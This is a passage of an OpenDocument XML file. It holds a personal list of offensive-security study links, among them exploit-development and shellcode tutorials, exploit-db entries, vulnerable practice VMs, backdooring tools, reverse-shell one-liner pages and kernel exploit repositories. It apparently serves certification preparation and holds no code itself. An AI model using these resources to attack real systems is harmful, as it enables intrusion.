          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://www.securitysift.com/windows-exploit-development-part-6-seh-exploits/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.securitysift.com/windows-exploit-development-part-6-seh-exploits/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://v00d00sec.com/2015/09/14/manually-backdooring-windows-executables/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://v00d00sec.com/2015/09/14/manually-backdooring-windows-executables/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://www.corelan.be/index.php/articles/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.corelan.be/index.php/articles/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://fuzzysecurity.com/tutorials.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://fuzzysecurity.com/tutorials.html</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://exploit-exercises.com/protostar" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://exploit-exercises.com/protostar</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://exploit-exercises.com/fusion" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://exploit-exercises.com/fusion</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://ihazomgsecurityskillz.blogspot.com/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://ihazomgsecurityskillz.blogspot.com/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://opensecuritytraining.info/Training.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://opensecuritytraining.info/Training.html</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://trailofbits.github.io/ctf/index.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://trailofbits.github.io/ctf/index.html</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://tuts4you.com/download.php?list.17" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://tuts4you.com/download.php?list.17</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://tuts4you.com/download.php?list.29" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://tuts4you.com/download.php?list.29</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://tuts4you.com/download.php?list.3" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://tuts4you.com/download.php?list.3</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://www.openrce.org/downloads/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.openrce.org/downloads/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/index.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/index.html</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://tuts4you.com/download.php?list.67" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://tuts4you.com/download.php?list.67</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://www.binary-auditing.com/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.binary-auditing.com/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://blog.g0tmi1k.com/dvwa/index/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://blog.g0tmi1k.com/dvwa/index/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://www.vividmachines.com/shellcode/shellcode.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.vividmachines.com/shellcode/shellcode.html</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://www.exploit-db.com/exploits/17527/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.exploit-db.com/exploits/17527/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://www.exploit-db.com/exploits/11834/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.exploit-db.com/exploits/11834/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://www.exploit-db.com/exploits/11872/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.exploit-db.com/exploits/11872/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://www.exploit-db.com/exploits/11764/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.exploit-db.com/exploits/11764/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://www.exploit-db.com/exploits/11656/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.exploit-db.com/exploits/11656/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://www.exploit-db.com/exploits/33453/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.exploit-db.com/exploits/33453/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://github.com/WebGoat/WebGoat" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/WebGoat/WebGoat</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://www.gironsec.com/blog/2016/06/backdooring-a-dll/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.gironsec.com/blog/2016/06/backdooring-a-dll/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://blog.knapsy.com/blog/2015/11/25/easy-file-sharing-web-server-v7-dot-2-remote-seh-buffer-overflow-dep-bypass-with-rop/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://blog.knapsy.com/blog/2015/11/25/easy-file-sharing-web-server-v7-dot-2-remote-seh-buffer-overflow-dep-bypass-with-rop/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://www.offensive-security.com/0day/quick-tftp-poc.py.txt" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.offensive-security.com/0day/quick-tftp-poc.py.txt</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://www.exploit-db.com/author/?a=278" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.exploit-db.com/author/?a=278</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://samsclass.info/127/proj/p4-lbuf-shell.htm" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://samsclass.info/127/proj/p4-lbuf-shell.htm</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://www.securitysift.com/windows-exploit-development-part-1-basics/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.securitysift.com/windows-exploit-development-part-1-basics/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://securitycafe.ro/2015/10/30/introduction-to-windows-shellcode-development-part1/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://securitycafe.ro/2015/10/30/introduction-to-windows-shellcode-development-part1/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="https://securitycafe.ro/2015/12/14/introduction-to-windows-shellcode-development-part-2/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://securitycafe.ro/2015/12/14/introduction-to-windows-shellcode-development-part-2/</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content_Last"> <text:a xlink:type="simple" xlink:href="http://www.vividmachines.com/shellcode/shellcode.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.vividmachines.com/shellcode/shellcode.html</text:a></text:p>
        </text:list-item>
      </text:list>
      <text:p text:style-name="Text_20_body">Vulnerable machines:
vulnhub VMs:
SickOS 1.1
SickOS 1.2
Droopy v0.2
Kevgir
Pegasus
SecTalks: BNE0x00 - Minotaur
SecTalks: BNE0x03 - Simple
NullByte: 1
FristiLeaks 1.3
OWASP Vulnerable Web Applications Directory Project
Mutillidae
Damn Vulnerable Web Application</text:p>
      <text:p text:style-name="Text_20_body">LFI/RFI
<text:a xlink:type="simple" xlink:href="https://penetrate.io/2014/01/10/from-rfi-to-shell/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://penetrate.io/2014/01/10/from-rfi-to-shell/</text:a></text:p>
      <text:p text:style-name="Text_20_body">Backdooring files with Python:
<text:a xlink:type="simple" xlink:href="https://github.com/secretsquirrel/the-backdoor-factory" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/secretsquirrel/the-backdoor-factory</text:a></text:p>
      <text:p text:style-name="Text_20_body">eBooks downloads:
<text:a xlink:type="simple" xlink:href="http://www.ebook777.com/gray-hat-hacking-ethical-hackers-handbook-fourth-edition/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.ebook777.com/gray-hat-hacking-ethical-hackers-handbook-fourth-edition/</text:a>
<text:a xlink:type="simple" xlink:href="https://github.com/JpGallegos/CySecBooks" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/JpGallegos/CySecBooks</text:a>
<text:a xlink:type="simple" xlink:href="https://www.securepla.net/the-hacker-playbook-2/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.securepla.net/the-hacker-playbook-2/</text:a>
“Hacking: The Art of Exploitation”</text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.linkedin.com/pulse/osce-cracking-perimeter-experience-sunny-neo" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.linkedin.com/pulse/osce-cracking-perimeter-experience-sunny-neo</text:a>
- Fuzzing (Scapy, TAO, Sulley)
- Linux Exploitation (vanila stack overflow, return to Glibc - NX bypass, repairing stack canaries, ASLR bypasses) and Windows exploitation (SEH overwrite,  Return Oriented Programming into disabling DEP)
- Web Application Hacker's Handbook (might be too large: Consider “webgoat”)</text:p>
      <text:p text:style-name="Text_20_body">Various sites:
<text:a xlink:type="simple" xlink:href="http://www.sweetscape.com/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.sweetscape.com/</text:a>  (010 Editor)
<text:a xlink:type="simple" xlink:href="https://github.com/campagnola/pycca" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/campagnola/pycca</text:a>
<text:a xlink:type="simple" xlink:href="https://github.com/Gallopsled/pwntools" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/Gallopsled/pwntools</text:a>
<text:a xlink:type="simple" xlink:href="https://github.com/reyammer/shellnoob" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/reyammer/shellnoob</text:a>
<text:a xlink:type="simple" xlink:href="https://zeltser.com/convert-shellcode-to-assembly/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://zeltser.com/convert-shellcode-to-assembly/</text:a>
<text:a xlink:type="simple" xlink:href="http://files.cnblogs.com/files/exclm/ollydbg_cmdline_cheat_sheet.pdf" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://files.cnblogs.com/files/exclm/ollydbg_cmdline_cheat_sheet.pdf</text:a>
<text:a xlink:type="simple" xlink:href="http://bernardodamele.blogspot.sg/2011/09/reverse-shells-one-liners.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://bernardodamele.blogspot.sg/2011/09/reverse-shells-one-liners.html</text:a>
<text:a xlink:type="simple" xlink:href="https://www.digitalocean.com/community/tutorials/how-to-use-bash-history-commands-and-expansions-on-a-linux-vps" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.digitalocean.com/community/tutorials/how-to-use-bash-history-commands-and-expansions-on-a-linux-vps</text:a>
<text:a xlink:type="simple" xlink:href="https://github.com/peterferrie/win-exec-calc-shellcode" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/peterferrie/win-exec-calc-shellcode</text:a>
<text:a xlink:type="simple" xlink:href="http://www.secniu.com/why-my-shellcode-cannot-work/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.secniu.com/why-my-shellcode-cannot-work/</text:a>
<text:a xlink:type="simple" xlink:href="http://thestarman.pcministry.com/asm/2bytejumps.htm" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://thestarman.pcministry.com/asm/2bytejumps.htm</text:a>
<text:a xlink:type="simple" xlink:href="http://blog.noobroot.com/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://blog.noobroot.com/</text:a>
<text:a xlink:type="simple" xlink:href="https://www.exploit-db.com/exploits/5342/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.exploit-db.com/exploits/5342/</text:a>
<text:a xlink:type="simple" xlink:href="http://exploit.co.il/hacking/manual-egghuntershellcode-encoding/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://exploit.co.il/hacking/manual-egghuntershellcode-encoding/</text:a>
<text:a xlink:type="simple" xlink:href="https://github.com/salcho/codetz" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/salcho/codetz</text:a>
<text:a xlink:type="simple" xlink:href="http://xangosec.blogspot.sg/2014/08/automating-sub-encoder.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://xangosec.blogspot.sg/2014/08/automating-sub-encoder.html</text:a>
<text:a xlink:type="simple" xlink:href="http://www.fuzzing.org/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.fuzzing.org/</text:a>
<text:a xlink:type="simple" xlink:href="http://resources.infosecinstitute.com/pattern-based-approach-memory-shellcodes-detection/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://resources.infosecinstitute.com/pattern-based-approach-memory-shellcodes-detection/</text:a>
<text:a xlink:type="simple" xlink:href="https://www.offensive-security.com/metasploit-unleashed/alphanumeric-shellcode/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.offensive-security.com/metasploit-unleashed/alphanumeric-shellcode/</text:a>
<text:a xlink:type="simple" xlink:href="https://0x41.no/hacking-networks-with-snmp/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://0x41.no/hacking-networks-with-snmp/</text:a>
<text:a xlink:type="simple" xlink:href="http://danielebellavista.blogspot.sg/2014/10/ia32-shellcodes-get-eip-value.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://danielebellavista.blogspot.sg/2014/10/ia32-shellcodes-get-eip-value.html</text:a>
<text:a xlink:type="simple" xlink:href="http://www.thepentesters.net/tutorials/tricks-escaping-linux-restricted-shells/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.thepentesters.net/tutorials/tricks-escaping-linux-restricted-shells/</text:a>
<text:a xlink:type="simple" xlink:href="http://codemachine.com/downloads.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://codemachine.com/downloads.html</text:a></text:p>
      <text:p text:style-name="Text_20_body">Fun random stuff:
<text:a xlink:type="simple" xlink:href="http://patriciopalladino.com/files/hieroglyphy/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://patriciopalladino.com/files/hieroglyphy/</text:a>
<text:a xlink:type="simple" xlink:href="http://n01g3l.tumblr.com/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://n01g3l.tumblr.com/</text:a>
<text:a xlink:type="simple" xlink:href="https://twitter.com/ch3rn0byl/status/832681279900487680" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://twitter.com/ch3rn0byl/status/832681279900487680</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://blog.g0tmi1k.com/2012/02/kioptrix-level-4-sql-injection/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://blog.g0tmi1k.com/2012/02/kioptrix-level-4-sql-injection/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://blog.g0tmi1k.com/2012/01/hackademic-rtb2/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://blog.g0tmi1k.com/2012/01/hackademic-rtb2/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/vanhoefm/modwifi" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/vanhoefm/modwifi</text:a>
<text:a xlink:type="simple" xlink:href="https://github.com/vanhoefm/blackhat17-pocs" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/vanhoefm/blackhat17-pocs</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/0x90/uberscapy" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/0x90/uberscapy</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/0x90/wifi-arsenal" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/0x90/wifi-arsenal</text:a>
<text:a xlink:type="simple" xlink:href="https://github.com/0x90/kali-scripts" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/0x90/kali-scripts</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://nets.ec/Main_Page" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://nets.ec/Main_Page</text:a>
<text:a xlink:type="simple" xlink:href="https://old.exploit-db.com/exploits/13284/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://old.exploit-db.com/exploits/13284/</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underc0de.org/foro/hacking/que-es-una-shellcode/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://underc0de.org/foro/hacking/que-es-una-shellcode/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://0x00sec.org/t/linux-shellcoding-part-1-0/289" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://0x00sec.org/t/linux-shellcoding-part-1-0/289</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://packetstormsecurity.com/files/90146/Ascii-To-Shellcode-Encoder-Decoder-Tool.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://packetstormsecurity.com/files/90146/Ascii-To-Shellcode-Encoder-Decoder-Tool.html</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/Grazfather/PracticalMalwareLabs" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/Grazfather/PracticalMalwareLabs</text:a>
<text:a xlink:type="simple" xlink:href="https://github.com/Grazfather/BlackHatPython" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/Grazfather/BlackHatPython</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/VulnHub/ctf-writeups" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/VulnHub/ctf-writeups</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://nullku7.github.io/stuff/vulnhub/walkthrough/2017/05/28/vulnhub-mr-robot.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://nullku7.github.io/stuff/vulnhub/walkthrough/2017/05/28/vulnhub-mr-robot.html</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/trustedsec" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/trustedsec</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://exploit.courses/#/challenges" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://exploit.courses/#/challenges</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://payatu.com/guide-linux-privilege-escalation/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://payatu.com/guide-linux-privilege-escalation/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/dobin/yookiterm-slides" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/dobin/yookiterm-slides</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://exploit.courses/files/bfh2018/content.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://exploit.courses/files/bfh2018/content.html</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://exploit.courses/files/bfh2017/content.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://exploit.courses/files/bfh2017/content.html</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://systemoverlord.com/2017/10/24/building-a-home-lab-for-offensive-security-basics.html#pre-made-vms-tools" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://systemoverlord.com/2017/10/24/building-a-home-lab-for-offensive-security-basics.html#pre-made-vms-tools</text:a></text:p>
      <text:list text:style-name="List_20_1" text:continue-numbering="false">
        <text:list-item>
          <text:p text:style-name="LastListParagraph_List_20_1_Content_First"> <text:a xlink:type="simple" xlink:href="https://github.com/xairy/linux-kernel-exploitation" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/xairy/linux-kernel-exploitation</text:a></text:p>
        </text:list-item>
      </text:list>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://blog.vonhewitt.com/2018/08/oscp-exam-cram-log-aug-sept-oct-2018/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://blog.vonhewitt.com/2018/08/oscp-exam-cram-log-aug-sept-oct-2018/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.exploit-db.com/exploits/44298" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.exploit-db.com/exploits/44298</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/jivoi/pentest" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/jivoi/pentest</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/lucyoa/kernel-exploits" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/lucyoa/kernel-exploits</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://n0where.net/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://n0where.net/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/Manisso/fsociety" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/Manisso/fsociety</text:a> <text:line-break/>Fsociety Hacking Tools Pack. A Penetration Testing Framework, you will have every script that a hacker needs</text:p>
      <text:p text:style-name="Text_20_body">Linux Kernel-Mode Rootkit Hunter for 4.4.0-31+.
<text:a xlink:type="simple" xlink:href="https://github.com/nbulischeck/tyton" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/nbulischeck/tyton</text:a>
<text:a xlink:type="simple" xlink:href="https://nbulischeck.github.io/tyton/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://nbulischeck.github.io/tyton/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/fireeye/flare-vm" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/fireeye/flare-vm</text:a> - FLARE VM - a fully customizable, Windows-based security distribution for malware analysis, incident response, penetration testing, etc.</text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://n0where.net/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://n0where.net/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/frizb/Vanquish" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/frizb/Vanquish</text:a> <text:line-break/>Vanquish is a Kali Linux based Enumeration Orchestrator built in Python. Vanquish leverages the opensource enumeration tools on Kali to perform multiple active information gathering phases. The results of each phase are fed into the next phase to identify vulnerabilities that could be leveraged for a remote shell.</text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.youtube.com/watch?v=YoNrNBnmwuY&amp;feature=youtu.be" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.youtube.com/watch?v=YoNrNBnmwuY&amp;feature=youtu.be</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/coreb1t/awesome-pentest-cheat-sheets" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/coreb1t/awesome-pentest-cheat-sheets</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.oracle.com/technetwork/community/developer-vm/index.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.oracle.com/technetwork/community/developer-vm/index.html</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/buglessdr?tab=repositories" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/buglessdr?tab=repositories</text:a></text:p>
